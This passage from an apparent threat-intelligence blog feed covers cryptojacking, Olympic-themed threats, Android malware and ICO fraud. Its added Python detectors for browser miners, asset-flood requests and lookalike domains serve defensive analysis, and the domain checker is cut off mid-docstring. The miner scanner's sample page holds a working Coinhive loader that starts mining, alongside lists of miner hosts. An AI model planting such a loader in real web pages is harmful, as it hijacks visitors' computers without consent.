    There are a couple of things Crypto Jacker does to increase traffic to the site.

    1. Users can load the metadata from the destination URL, making the page rank highly in search engine results.
    2. “Social Cloaking” (as shown in Figure 3) makes the imitation link appear to come from the original destination, increasing the likelihood of clicks.

    Figure 3: Crypto Jacker’s “social cloaking” demonstration video

    It’s unsurprising that Crypto Jacker has these SEO features, given that other products sold under the name Thomas Witek (the author of Crypto Jacker) include “Click Jacker”, “Link Cloaker” and “Gram Poster”. The shift in business model from advertising to cryptocurrency mining is explicitly referenced on the website: “advertising on the web is difficult to profit from….why shouldn’t you mine crypto coins.” This is part of a broader shift towards cryptocurrency fraud by a variety of actors, which we analyse in more detail in our recent research report, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Scam or Legitimate?

    Is this a scam? It’s possible that Crypto Jacker is a ruse to cash in on web developers’ interest in cryptocurrency mining. This review questions the nature of the site itself.

    Our own tests of the demo website (paidallday[.]com/what-you-need-to-know-about-bitcoin), shown on the Crypto Jacker website, show that cryptocurrency mining is likely taking place. As shown in Figure 4, the page appeared to load the plugin “cj-plugin”, which launched the “” script. When we visited the site, CPU usage rose sharply to around 50% (as shown in Figure 5). A CPU spike on its own is weak evidence, since any heavy script produces one; the loaded miner script is the stronger indicator. While this does not confirm that the Crypto Jacker product works as advertised, it does add some credibility to the claim.

    Figure 4: The source code of paidallday[.]com/what-you-need-to-know-about-bitcoin, a demo website shown in Crypto Jacker videos

    Figure 5: CPU usage peaking at the time of the visit to the website

    Interest in cryptocurrencies shows no sign of slowing down and, while Crypto Jacker does not appear to have developed a large user base, its emergence – if legitimate – is an attempt to lower the barrier to entry for those looking to use stealthy cryptocurrency mining software.
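    The check we ran on the demo page (look at the loaded scripts, then at what the page does to the CPU) can be made repeatable. The scanner below is an added example and not Digital Shadows code or the Crypto Jacker product’s own: it parses a page’s HTML and flags script tags served from known miner hosts, inline scripts that construct and start a miner, and the cloaking pattern the product describes, a full-viewport iframe of a third-party site behind which the miner keeps running in the parent document. The indicator lists (miner hosts and constructor names) and the sample pages are assumptions.

```python
"""Scan page HTML for browser-miner scripts and content-cloaking iframes.

Added example, not Digital Shadows code. Assumed indicators: MINER_HOSTS is
the set of script hosts discussed in the post; MINER_CTORS are the JavaScript
constructors those miners expose (Coinhive's documented entry point is
`new CoinHive.Anonymous(key)` followed by `.start()`).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

MINER_HOSTS = {"coinhive.com", "authedmine.com", "crypto-loot.com"}
MINER_CTORS = ("CoinHive.Anonymous", "CoinHive.User", "CRLT.Anonymous")


def _host(url):
    return (urlsplit(url).hostname or "").lower()


class MinerScanner(HTMLParser):
    """Collect (kind, evidence) findings while walking the document."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            if src and _host(src) in MINER_HOSTS:
                self.findings.append(("miner_script_src", src))
        elif tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            # Cloaking pattern: a third-party iframe sized to fill the viewport,
            # so the visitor sees someone else's content while this page's
            # scripts keep running in the parent document.
            fills_viewport = "width:100%" in style and "height:100%" in style
            if _host(src) and _host(src) != self.page_host and fills_viewport:
                self.findings.append(("cloaking_iframe", src))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            # Require both a known miner constructor and a .start( call, so a
            # page that merely mentions the name is not flagged.
            if any(c in body for c in MINER_CTORS) and ".start(" in body:
                self.findings.append(("miner_inline_start", body.strip()[:60]))


def scan_html(html, page_host):
    """Return the list of (kind, evidence) findings for one page."""
    p = MinerScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


def verdict(findings):
    kinds = {k for k, _ in findings}
    miner = bool(kinds & {"miner_script_src", "miner_inline_start"})
    cloak = "cloaking_iframe" in kinds
    if miner and cloak:
        return "cryptojacking_with_cloaked_content"
    if miner:
        return "miner_present"
    return "clean"


# Constructed sample pages (not captured from any real site).
SAMPLE_HTML = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY-PLACEHOLDER', {throttle: 0.5});
  miner.start();
</script>
</head><body>
<iframe src="https://news.example.com/article" style="width:100%; height:100%; border:0"></iframe>
</body></html>"""

CLEAN_HTML = """<html><head><script src="https://cdn.example.com/app.js"></script></head>
<body><iframe src="https://www.youtube.com/embed/x" width="560" height="315"></iframe></body></html>"""

if __name__ == "__main__":
    for page in (SAMPLE_HTML, CLEAN_HTML):
        f = scan_html(page, "demo.example.net")
        print(verdict(f), f)
```

    Run it against the rendered DOM rather than the raw response where you can, since loaders frequently inject the miner script at runtime; the static version above is still enough to triage a suspected WordPress install offline.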

    Protect yourself from Crypto mining

    1. Have a reputable ad blocker

    Organizations that do not wish to be cryptojacked into mining cryptocurrency for someone else should ensure they have a reputable ad blocker in place. Consider ad blockers such as AdBlock, AdBlock Plus, 1Blocker and uBlock Origin. The NoCoin browser extension was developed specifically to block coin miners such as Coinhive.

    2. Apply patches to known vulnerabilities

    Organizations should apply patches and mitigations for known vulnerabilities, as these are used to deliver crypto miners. In December 2017, for example, PyCryptoMiner began exploiting a vulnerability affecting JBoss servers that was first disclosed in October. More recently, an Apache Struts exploit has been used to deploy Monero miners. Sources such as US-CERT, the National Vulnerability Database and MITRE provide the latest information on newly disclosed vulnerabilities. Red Hat provided mitigation advice for the JBoss vulnerability exploited by PyCryptoMiner, and patches for the Struts vulnerabilities are also available.


    Download our latest research paper The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud to learn more about cryptocurrency fraud, and ways to protect against.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 12.02.2018 Mon, 12 Feb 2018 15:23:39 +0000 With the 2018 Winter Games beginning this week, the Digital Shadows Research Team focused on threats to those traveling to South Korea in this episode of Shadow Talk. There was also a roundup of the most recent cyber security news.

    Malware in Winter Olympics spearphishing campaign identified

    Anti-virus security company McAfee published a report detailing four variants of malware linked to the targeting of organizations associated with the XXIII Winter Games in South Korea. The variants were identified as “Gold Dragon”, “Brave Prince”, “Ghost419” and “RunningRat”. During the games themselves, we expect there to be a rise in cybercriminal activity, achieved through point of sale malware infections at hospitality, leisure and retail locations, ATM skimming, banking fraud and scam emails. VIPs travelling to the event are advised to use alternative forms of payment like chip and pin, pre-paid and pre-capped cards. Travellers should also opt for Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi.


    Operation Pzchao: not your typical espionage campaign

    The espionage-driven campaign Operation Pzchao has affected multiple entities across government, technology, education and telecommunications in North America, Russia, Oceania and Asia since 2016. Victims received emails containing a Visual Basic Script (VBScript) file, which retrieved second-stage payloads: a Bitcoin mining application, the credential harvester “Mimikatz”, and variants of the “Gh0st” remote-access trojan (RAT). Digital Shadows analysts cast doubt on the reported attribution to a Chinese state-linked advanced persistent threat (APT) group — the use of a Bitcoin miner, inconsistencies in the reported distribution method and the use of a widespread RAT tool with no additional custom malware are not typical of a highly coordinated, state-linked group.


    Adobe zero-day vulnerability exploited in attacks against South Koreans

    The South Korean Computer Emergency Response Team (CERT) warned that a critical Adobe vulnerability was exploited in attacks targeting South Koreans involved in geopolitical research. Spearphishing emails were the only known vector of the attacks, which were attributed to a North Korean threat group. The emails distributed a variant of the “ROKRAT” trojan, which has reconnaissance and information-stealing capabilities. Adobe has issued security updates for the vulnerability, identified as CVE-2018-4878. Further exploitation attempts of this flaw are highly likely.


    Denial of service vulnerability discovered in WordPress platform

    A vulnerability identified in the WordPress online publishing platform could enable an attacker to conduct denial of service attacks. The researcher who identified the flaw claimed that requests for large JavaScript or Cascading Style Sheet (CSS) files could be sent repeatedly to sites, resulting in the denial of legitimate traffic. WordPress has indicated it does not plan to patch the flaw, although exploitation of this vulnerability could potentially reverse this decision. The researcher released proof-of-concept (POC) code, and secondary reporting suggested a small number of exploitation attempts had been detected. Further attempts are considered highly likely to occur.
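    Because the flaw is unpatched, the practical control sits in front of the site: spotting and throttling a client that keeps fetching the same large script or style file. The Python below is an added example, not code from the Digital Shadows post; it parses a few constructed access-log lines in the common Apache/Nginx format and alerts when one client requests the same asset path more than a threshold inside a sliding window. The thresholds, log format and sample lines are assumptions.

```python
"""Added example: spot a client hammering the same large script/style file.

The WordPress issue above works by requesting large JavaScript or CSS
resources over and over.  This parser reads access-log lines in the common
Apache/Nginx format and raises an alert when one client fetches the same
asset path at least MAX_HITS times inside WINDOW_SECONDS.  Thresholds, the
log format and the sample lines are assumptions, not taken from the post.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 10   # sliding window length (assumed)
MAX_HITS = 5          # requests for one asset inside the window before alerting (assumed)

# Common log format: client ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"],
        "status": int(m["status"]),
        "size": 0 if m["size"] == "-" else int(m["size"]),
    }


def is_asset(path):
    """True for script/style resources; the query string is ignored."""
    return path.split("?", 1)[0].endswith((".js", ".css"))


def detect(lines, window_seconds=WINDOW_SECONDS, max_hits=MAX_HITS):
    """Return one alert per (client, asset) pair that exceeds the request budget."""
    recent = defaultdict(deque)   # (ip, path) -> timestamps still inside the window
    served = defaultdict(int)     # (ip, path) -> bytes sent to that client for that asset
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_asset(rec["path"]):
            continue
        # Key on the path without its query string: cache-busting parameters
        # (?v=1, ?v=2, ...) must not split one asset into many counters.
        key = (rec["ip"], rec["path"].split("?", 1)[0])
        q = recent[key]
        q.append(rec["ts"])
        served[key] += rec["size"]
        # Drop timestamps that have fallen out of the sliding window.
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= max_hits and key not in alerts:
            alerts[key] = {"ip": key[0], "path": key[1], "hits": len(q),
                           "bytes": served[key], "at": rec["ts"].isoformat()}
    return list(alerts.values())


# Constructed sample log: one ordinary visitor and one client fetching a 4 MB
# bundle six times in three seconds.  IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.2 - - [12/Feb/2018:10:00:00 +0000] "GET / HTTP/1.1" 200 5120',
    '198.51.100.2 - - [12/Feb/2018:10:00:00 +0000] "GET /wp-includes/css/site.css HTTP/1.1" 200 20480',
    '203.0.113.7 - - [12/Feb/2018:10:00:01 +0000] "GET /wp-includes/js/bundle.js?v=1 HTTP/1.1" 200 4194304',
    '203.0.113.7 - - [12/Feb/2018:10:00:01 +0000] "GET /wp-includes/js/bundle.js?v=2 HTTP/1.1" 200 4194304',
    '203.0.113.7 - - [12/Feb/2018:10:00:02 +0000] "GET /wp-includes/js/bundle.js?v=3 HTTP/1.1" 200 4194304',
    '203.0.113.7 - - [12/Feb/2018:10:00:02 +0000] "GET /wp-includes/js/bundle.js?v=4 HTTP/1.1" 200 4194304',
    '203.0.113.7 - - [12/Feb/2018:10:00:03 +0000] "GET /wp-includes/js/bundle.js?v=5 HTTP/1.1" 200 4194304',
    '203.0.113.7 - - [12/Feb/2018:10:00:03 +0000] "GET /wp-includes/js/bundle.js?v=6 HTTP/1.1" 200 4194304',
    '198.51.100.2 - - [12/Feb/2018:10:00:30 +0000] "GET /wp-includes/css/site.css HTTP/1.1" 304 -',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['ip']} fetched {alert['path']} {alert['hits']}x "
              f"({alert['bytes']} bytes) by {alert['at']}")
```

The alert is the input for a rate-limit or block rule at the proxy or WAF; the bytes counter shows why a handful of requests for a large bundle matter more than the same number for a small image.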


    United States authorities charge 36 individuals allegedly behind the ‘Infraud’ cybercrime forum

    On Wednesday 7 February, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud carding forum. This was the result of an operation known as “Shadow Web”. Although Infraud was a significant player in the carding ecosystem, there are still many more forums and automated vending carts (AVCs) in operation, and the closure of one site will mean criminal actors migrate to other forums. Therefore, the threat posed to organizations by carding fraud remains the same. Our research also indicated that some sites run by vendors on the Infraud forum are still active.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    2017 Android malware in review: 4 key takeaways Thu, 08 Feb 2018 18:25:34 +0000 Android mobile devices were an attractive target for malicious activity throughout 2017. The ubiquity of these devices, and the sensitive data they often hold, enticed both espionage and financially motivated attackers. In 2017, we reported on 48 separate campaigns that targeted mobile applications and vulnerabilities. Our research highlighted the following key takeaways from the past year:

    1. Official app stores are not infallible

    Google Play was the most frequently cited single source of Android malware infections. Despite the security measures put in place, the official Google Play store can still be used to distribute malicious applications, and given its popularity, criminal actors will continue to target it as a means of distributing malicious apps.

    However, 66% of reported initial infections were from locations other than the official app store. Google Play’s profile can also slightly skew public reporting of Android malware infections, as security researchers will often focus on identifying security weaknesses on the most well-known platforms ahead of other, third-party sites. The number of infection entry points outside of app stores should remind us to remain vigilant of phishing texts and emails, and to take added precautions when browsing on mobile devices.


    Figure 1: Reported initial infection points for mobile malware since January 1st 2017 (unknown omitted)


    2. Appearances can be deceiving

    Attackers predominantly used two variations of malicious apps to disguise malware and push downloads; apps either a) acted as legitimate resources such as cryptocurrency, security and games services, or b) fraudulently used branding associated with credible organizations, like Chrome or Adobe.

    Once installed, malware used a variety of methods to obtain device or user information, including requesting that the user accepts unnecessary permissions and escalating administrative privileges. Where user interaction was required to harvest data, overlays – where a malicious app superimposes over a legitimate app – were commonly deployed to prompt users to enter personal and financial information.

    These Android malware deployments included both opportunistic campaigns where users inadvertently downloaded malicious apps from a given site, as well as more targeted social engineering campaigns, such as those targeting users based in a particular country or industry.


    Figure 2: Reported techniques, tactics and procedures in Android incidents since January 1st 2017


    3. Espionage and financial gain were the primary motives

    Gathering information, such as profiling device information or recording phone calls and messages, was the most prevalent reason for infection. Collecting financial and banking data came a close second. Mobile banking malware uses sophisticated techniques for harvesting data, including overlays specific to target banks, and intercepting SMS messages to obtain multi-factor authentication codes.

    Given the increase in reports of cryptocurrency mining malware in 2018, which is partly a result of the steep rise in cryptocurrency prices, there is a realistic possibility that more Android malware attacks will incorporate cryptocurrency mining payloads in future.


    Figure 3: Reported function of mobile malware since January 1st 2017

    4. How to avoid infection

    We expect malware campaigns against the Android platform to continue in 2018; nevertheless, enterprises and individuals can take several preventative measures to lower the risk of infection:

    • Use the official Google Play store; only download “Play Protect verified” apps from legitimate companies
    • Only allow limited permissions for downloaded apps
    • For enterprise devices, Mobile Device Management solutions give IT security staff control to set access permissions and restrictions
    • Do not root enterprise devices, as rooting allows access to the Android operating system code. Preventing rooting mitigates unauthorized administration privilege access.
    • Deploy endpoint antivirus solutions on individual devices
    • Enterprises that allow Bring Your Own Device (BYOD) should establish user policies and disallow connecting BYOD devices to corporate infrastructure.
    • Educate employees on threats associated with SMS phishing and mobile device browsing

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox.

    Phishing for Gold: Threats to the 2018 Winter Games Tue, 06 Feb 2018 14:12:22 +0000 Digital Shadows has been monitoring major sporting events since 2014, beginning with the Winter Olympics in Sochi, Russia, and then the 2014 World Cup in Brazil. The 2016 Olympics, held in Rio de Janeiro, were a hotbed of cyber activity, dominated by the OpOlympicHacking campaign, physical protests, and high levels of cybercrime against attendees. Rio showed that cyber actors look to profit from the millions of visitors, global media audience and increased number of financial transactions that accompany major sporting events.

    Although hacktivist and physical protest activity often accompany events with international media coverage, we believe cyber crime and fraud will be the most imminent and prevalent threats to the 2018 Olympic event and its attendees. Rio was also significant as it highlighted how actors working with the approval or on behalf of nation-states can use the cover of global sporting events for their own goals. In 2018, regional tensions between North and South Korea may well contribute to nation-state cyber operations, although it’s unclear how the recent public overtures between the two states and the decision to invite North Korean athletes to the event will affect this.

    As millions of fans descend on South Korea, particularly business and political VIPs, we believe the event will likely be targeted by a variety of cyber actors. This includes financially motivated cyber-criminals and more capable nation state actors – possibly as a dry-run for campaigns during the larger 2018 World Cup to be hosted later this year in Russia.


    The Games Have Already Begun

    We have already reported on data leaks and phishing attempts targeting organizers and affiliates of the Winter Olympics. As well as this, our SearchLight platform found several potentially malicious domains, social media accounts and infrastructural issues that could be used in future attacks.

    Both in the lead up and during the event, we expect to see:

    • Phishing – As well as targeting volunteers, attackers will use interest in the event as a lure when sending malicious phishing emails. We discovered several typo-squat domains that use the 2018 Winter Olympics and World Anti-Doping Agency (WADA) brand names. These domains were not registered to official entities, and over half were registered in Russia and Ukraine or behind proxy services. Although not currently used in active campaigns, these domains could be used in phishing attacks to distribute malware or harvest credentials.

    Selection of typo-squat domains discovered by Digital Shadows


    • Exposed credentials. We searched for examples of exposed credentials belonging to Olympic and WADA accounts in our repository of third party breaches. Here we found at least 300 examples of Olympic or WADA credential pairs in multiple breached datasets that became public in the last 12 months. These credentials could be used for further cyber-attacks against Olympic organizations, including spear-phishing and account takeover.


    Selection of exposed credentials for Olympic and WADA domains in breaches found by Digital Shadows

    • Data Leaks. In January, the Fancy Bears group – a self-proclaimed hacktivist group believed to be affiliated to the Russian state – published emails from the International Olympic Committee and International Luge Federation, likely in retaliation for the banning of Russian athletes over alleged doping. On January 31, they published further information implicating Canadian athletes. “Fancy Bears” is a play on the widely used name “Fancy Bear” (APT-28), which refers to an espionage group that the US intelligence community has linked to the Russian intelligence services. It is still unclear whether the two groups are one and the same; nevertheless, data leaks against WADA and the International Olympic Committee have been conducted under the Fancy Bear name since Rio in 2016.

    Fancy Bears announce leak of documents belonging to Canadian athletes via Twitter

    • Malware attacks. 2018 Olympic volunteers were targeted by macro-malware through email attachments imitating genuine documentation from the official 2018 Winter Olympics website. The original contained logistics details for the volunteers, suggesting the malware was aimed at either the volunteers themselves, or the volunteer portal. More recently, a data-gathering malware known as GoldDragon was identified targeting organizations associated with the 2018 Winter Olympics. In this case, the payloads were designed to establish persistence on targeted machines and enable further data exfiltration, as well as provide an ability to download additional malware.
    • Attacks on Wi-Fi network users. Attackers have previously compromised public Wi-Fi networks when going after high-value targets. The campaign known as DarkHotel, for example, used spoofed software updates on infected Wi-Fi networks targeting hotels in Asia, while APT-28 used credentials likely stolen from Wi-Fi networks in hotels to deploy remote access malware that could steal information and allow for lateral movement across networks.
    • Financial cybercrime. Criminals will often try to exploit the large number of visitors and increase in financial transactions, particularly in areas of high tourist density such as city centers, hotels, restaurants and shopping. For example, between March and July 2017, over 41 Hyatt Hotel locations in 11 countries were compromised, resulting in the compromise of customer payment card details. 18 of the affected hotels were in China, but branches in South Korea, Japan, North and South America were also impacted. As well as an increase in payment card theft through point of sale malware infections at hospitality, leisure and retail locations, expect a rise in ATM skimming, banking fraud and scam emails.


    Visualizing the Threat

    Below is a visualized form of the expected threat landscape of the upcoming event. It breaks down potential targets for the Winter Olympics and presents some of the most likely risks for each.



    Podium Finish

    The 2018 Winter Olympics is expected to be a focal point of criminal and politically-charged cyber activity, as seen in previous similar events. The following mitigation techniques can help limit the impact of the malicious activity that will likely occur:

    • Update and patch. First and foremost, organizations should make sure their firmware and OS systems are updated with the latest patches, especially Microsoft applications.
    • Be wary of scams and phishing emails. Do not click on any links in emails marketing or referencing the event. The IOC will not be launching an email marketing campaign with “FREE TICKETS!!1!” and any claimed scandals pertaining to athletes can be found on trusted news media sites, not in any “YOU WON’T BELIEVE HOW THIS ATHELETE WON 20 GOLD MEDALS, CLICK HERE TO FIND OUT” emails.
    • When downloading applications, make sure you only initiate these from legitimate sites such as the Apple and Google stores. Also ensure you review security and access permissions granted to these programs. In November 2017 it was discovered that Android malware previously used by the Lazarus Group – an actor affiliated to the North Korean state – had been used to target the general public in South Korea.
    • Be vigilant when using ATMs in-country. Look out for evidence of machine tampering: some skimming devices can be spotted by a quick wiggle of the card reader or through visible marks on the PIN code area. To help lessen the impact of Point of Sale malware and ATM skimming, alternative forms of payment like chip and pin, pre-paid and pre-capped cards should be considered.
    • Avoid untrusted networks. Corporate users should use Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi. Multi-factor authentication can also help combat successful account compromises.
    • Protect VIPs. High-value employees traveling to the event should consider having their technology and devices placed in isolated corporate networks preceding and during the event. Following the event, a quarantine period could also be established to ensure nothing malicious has been brought back into the corporate network.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Shadow Talk Update – 02.05.2018 Mon, 05 Feb 2018 15:26:46 +0000 In this week’s podcast episode of Shadow Talk, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.


    In-development malware samples observed targeting Spectre and Meltdown

    Researchers reportedly detected malware samples designed to exploit the Spectre and Meltdown vulnerabilities. The samples appeared to be in development and were not actively exploiting the flaws. Though these samples may have been designed for exploitation purposes, there were still no detected samples accomplishing this activity. It is likely that Spectre and Meltdown exploits will continue to be developed into the near future.


    Japanese cryptocurrency stolen in huge cyber-heist

    On January 26, 2018 the Japan-based cryptocurrency exchange Coincheck suffered a large-scale cyber-heist. Attackers reportedly stole 58 billion Japanese yen ($530 million) worth of NEM, a peer-to-peer cryptocurrency established in 2015. Coincheck announced it will reimburse most of the stolen funds to its 260,000 affected customers. As the technology and security framework supporting digital currencies expands, attackers will likely look for vulnerabilities, such as exchange platforms where digital “hot” wallets are connected to the internet. The consistently high value and increased availability of cryptocurrencies means threat actors will likely target them regularly this year.


    Dutch banks suffer DDoS attacks

    On 29 January 2018 financial institution Rabobank became the latest Dutch company to announce it had been affected by a distributed denial of service (DDoS) attack. Public reporting has been largely speculative, preventing independent assessment of the attacks. The botnet associated with the attacks has not been detected in other DDoS activities, and the size of the attacks (40Gbps) was relatively small, if accurately reported. Some media outlets linked the attacks to Russia, claiming they were retribution for recent reports of Dutch intelligence agencies infiltrating the Russia-linked group “APT-29” (Cozy Bear).


    Anonymous collective announces new phase of OpCatalunya

    On 29 January 2018 AnonPlus announced a new phase of OpCatalunya, the Anonymous operation supporting Catalan independence. OpCatalunyaNew has so far generated many DDoS claims and affected several Spanish companies across a variety of sectors. The catalyst was likely a Spanish Constitutional Court ruling on the investiture of regional president Carles Puigdemont, an independence supporter. The coordination of the new campaign by small groups indicates the growing split in the Anonymous collective and has enabled operations to gain longevity and consistency of targeting.


    Severe RCE vulnerability in Cisco ASA devices

    Cisco released software updates addressing a remote code execution (RCE) vulnerability affecting Cisco Adaptive Security Appliance (ASA) software. At the time of writing there was no proof of concept exploit code identified for vulnerability CVE-2018-0101, nor any reports of exploitation by threat actors. However, as RCE vulnerabilities are attractive to threat actors, exploitation is a realistic possibility in the next three months to a year. Cisco provided a list of affected products, as well as details on how to identify vulnerable software versions.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Four Ways Criminals Are Exploiting Interest in Initial Coin Offerings Thu, 01 Feb 2018 13:43:00 +0000 Initial Coin Offerings (ICOs) are a way of crowdfunding cryptocurrencies and cryptocurrency platforms. By the end of 2017, almost $4 billion was raised in this way. However, as consumers rush to be the first to invest in a promising new cryptocurrency or platform, their investments can instead go into the accounts of criminals. These criminals seek to make their money in four main ways:

    • Targeting genuine cryptocurrency platforms
    • Exit scams
    • Imitating or spoofing cryptocurrency platforms
    • Price manipulation

    This is only one aspect of cryptocurrency fraud, but you can learn more in our latest research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.


    Targeting Genuine Cryptocurrency Platforms

    At the end of January, a Japanese cryptocurrency exchange platform called Coincheck announced the theft of over $500m in NEM. The cryptocurrency NEM has since stated that attackers targeted a vulnerable wallet that had not used the currency’s available security features. $530 million surpasses the record set by Mt Gox in 2014.

    Targeting these platforms doesn’t have to be complex. In July 2017, criminals compromised the CoinDash website, replacing the initial Ethereum address with one controlled by the attacker. This new address received at least 2,314 payments from prospective CoinDash investors, totaling over 40,000 Ether. Over $7 million in Ethereum had been transferred to the fake address by the time CoinDash noticed the issue and suspended the ICO.


    Figure 1: Attacker’s Ether wallet during CoinDash ICO in July 2017


    More recently, the Initial Coin Offering for blockchain application company Experty was targeted by actors who sent phishing emails to potential coin buyers, prompting them to send funds to an attacker-owned wallet in return for a 33% bonus. The attacker’s wallet reached about 125 Ether ($125,000). We’ll be digging into approaches to phishing and account takeover against cryptocurrency holders in a future blog.


    Exit scams

    An exit scam refers to a cryptocurrency or platform that is established with the plan of attracting many customers before disappearing with all of their funds. There have been a host of exit scams in 2017 and 2018, including Confido, Benebit and Plexcoin.

    This week, the US Securities and Exchange Commission (SEC) claimed to have shut down an alleged Initial Coin Offering scam by AriseBank. The site claimed to have raised over $600 million of its $1 billion goal. The SEC determined that AriseBank had violated securities regulations, as it was selling financial products that required the firm to be registered with the SEC. While the SEC has put a concerted effort into identifying and assessing potentially fraudulent ICOs, the sheer number of new cryptocurrency products and platforms means exit scams will likely continue for some time.


    Spoofing Cryptocurrency Platforms

    Rather than create their own new cryptocurrency, criminals can also impersonate existing platforms. A recent example is the announcement that Telegram would be launching its own coin, which has led to a host of different spoof domains hoping to lure unsuspecting consumers into investing on the wrong platform. Despite Telegram stating that any announcement would be first done on Telegram, this has not stopped the creation of several spoof sites. Grampreico[.]com (shown below) is one such example, making $2000 to date.

    Figure 3: Grampreico[.]com claiming to be the initial coin offering for “Gram” token

    A different, though similar, approach is to register a similar looking domain and clone the contents of the target website. Myetherwallet[.]uk[.]com is a good example of a spoof site: it offers to “access your wallet” for you if you provide it with your private key.

    Figure 4: Spoof site for myetherwallet[.]com


    Cryptocurrency Price Manipulation

    Just as traders illegally inflate prices of stock in the real world, so too do groups of cybercriminals. This technique is known as “pump and dump”, and several online groups exist to inflate the price of smaller, less well-known currencies in order to cash in on the increase in value.

    Figure 5 shows the process followed by one Discord “pump” group, describing how they first “spread great news on twitter and Reddit”, before “mass retweet, like and react on the tweet”.

    Figure 5: A description of how “pump and dump” works, as described in one Pump and Dump Discord group


    Questions to Ask Yourself Before Investing in an ICO

    ICOs can be a great way for consumers to identify promising coins and platforms early on and profit from their rise. However, potential investors should be wary of sites or sellers with unsolicited offers, or coins that guarantee high returns without solid justification. Three questions you can ask yourself are:

    1. Does the coin you are looking to invest in have an active online community with engaged developers?
    2. Have other online users reported the coin as a scam?
    3. Does the coin’s documentation hide behind marketing jargon that makes no effort to explain the technical aspects?

    For those that do invest, make sure you have strong password hygiene and make use of multifactor authentication to secure your accounts.

    To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud or listen to our podcast below:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Why Marketing Leaders Must Take Action To Manage Digital Risk And Protect Their Brand Tue, 30 Jan 2018 14:14:20 +0000 I am one of you. I have been in the marketing field for more than 20 years and have seen unimaginable technology shifts that have made the world a more connected and efficient digital machine. We can now engage digitally with consumers around the globe on so many screens (watch, mobile, tablet, laptop, desktop, TV, automobile, etc), at any place and at any time. The companies we work for have greatly benefited from this new digital age. We now have data everywhere, including customers, employees, and third party data on all kinds of devices, on premise and in the cloud. Combine these two digital shifts and we have an amazing opportunity as marketers to engage in a personal way with our customers like never before. With this great opportunity, there also comes great risk if your company is not protecting itself from digital risks.

    Everyone knows about the brands that have been breached. You read about it in the headlines almost daily that another brand has been breached and the data belonging to hundreds of millions of customers and employees has been stolen. Breaches have become so common that we are all getting tired of hearing about it. Many of the breaches occur due to phishing and social engineering; making use of malicious websites, fake social media profiles, and fake mobile applications to trick customers and employees to unknowingly hand over their personal data and log-in credentials. This data is then used for profit by the attackers or sold on the open, deep, and dark web for others to do what they will. It impacts everyone including the company, the brand, customers, third parties, employees, you, me, and even our kids.

    As marketing leaders, we are all brand stewards for our company and our customers. We need to do everything we can to make our customers love us and trust us. We could do 99.999% of things right, but with one simple “We’ve been hacked” experience, it could wreck it all. That is why we must play an active role working with our security team and be proactive in managing digital risk to protect the brand. As I have learned over the years, the best way to help customers and businesses is to tell them real customer stories that they can relate to as they share the same pain and concerns. I am about to share some real customer stories with you. These stories are really important as many of you, your brand, and your customers may be impacted by these same issues. Here are some customer stories that are 100% real that every marketing leader should know about as these digital risks are your risks.

    1. We found malicious website domains that look like the real brand:

    By monitoring for registrations of domains that appear similar to a well-known brand’s website, a spoof domain was discovered. The domain had been registered overnight, swapping “rn” for an “m” so it looked exactly like the brand’s .com website. The content was an exact mirror of the client’s legitimate site and, aside from lacking some functionality of the legitimate site, appeared genuine to the casual user. The goal of the fake website was to fool unsuspecting users into entering their usernames and passwords. The attackers could then use these credentials to log in as the customer, take over their account and drain their funds, resulting in upset customers who have had their money stolen and ultimately hold your brand accountable. Brand damage successful.

    The good news is with effective Digital Risk Management, you can identify these fake websites, and take them down before fraud is conducted against your customers.
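    The lookalike tricks described across these posts, the Olympic typo-squat domains, myetherwallet[.]uk[.]com with the brand parked under someone else’s registrable domain, and the “rn” for “m” swap above, can all be caught by the same checks. The Python below is an added example and not Digital Shadows’ SearchLight code; it classifies hostnames from a constructed feed (only myetherwallet[.]uk[.]com comes from the posts) against a brand name. It assumes the registrable domain is the last two labels; real tooling should consult the Public Suffix List instead.

```python
"""Added example: flag hostnames that impersonate a brand domain.

Covers the techniques described in the posts: typo-squats (one edit away),
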